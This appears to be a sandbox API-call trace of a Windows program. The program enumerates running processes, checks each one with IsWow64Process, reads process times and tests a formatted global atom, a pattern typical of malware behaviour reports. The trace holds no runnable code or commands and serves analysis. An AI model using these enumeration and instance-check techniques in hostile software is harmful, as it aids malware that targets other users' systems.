	[0070.808] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.808] CloseHandle (hObject=0x224) returned 1
	[0070.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0070.808] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.808] CloseHandle (hObject=0x224) returned 1
	[0070.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0070.808] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.808] CloseHandle (hObject=0x224) returned 1
	[0070.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0070.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.809] CloseHandle (hObject=0x224) returned 1
	[0070.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0070.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0070.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.809] CloseHandle (hObject=0x224) returned 1
	[0070.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0070.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.809] CloseHandle (hObject=0x224) returned 1
	[0070.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0070.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.809] CloseHandle (hObject=0x224) returned 1
	[0070.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728818, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0070.809] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.809] CloseHandle (hObject=0x224) returned 1
	[0070.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0070.810] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.810] CloseHandle (hObject=0x224) returned 1
	[0070.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728878, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0070.810] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.810] CloseHandle (hObject=0x224) returned 1
	[0070.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0070.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0070.810] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.810] CloseHandle (hObject=0x224) returned 1
	[0070.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb30, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0070.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.810] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.810] CloseHandle (hObject=0x224) returned 1
	[0070.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0070.810] GetLastError () returned 0x5
	[0070.810] GetLastError () returned 0x5
	[0070.810] GetLastError () returned 0x5
	[0070.810] GetLastError () returned 0x5
	[0070.810] GetLastError () returned 0x5
	[0070.810] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetLastError () returned 0x5
	[0070.811] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.812] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.812] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.812] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetLastError () returned 0x5
	[0070.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.814] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.814] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.814] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.814] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0070.814] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.814] CloseHandle (hObject=0x224) returned 1
	[0070.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0070.815] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.815] CloseHandle (hObject=0x224) returned 1
	[0070.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16a98) returned 0xc0000004
	[0070.866] VirtualAlloc (lpAddress=0x0, dwSize=0x16b98, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16b98, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0070.870] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.870] CloseHandle (hObject=0x224) returned 1
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0070.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.871] CloseHandle (hObject=0x224) returned 1
	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0070.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.871] CloseHandle (hObject=0x224) returned 1
	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0070.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.871] CloseHandle (hObject=0x224) returned 1
	[0070.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0070.871] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.871] CloseHandle (hObject=0x224) returned 1
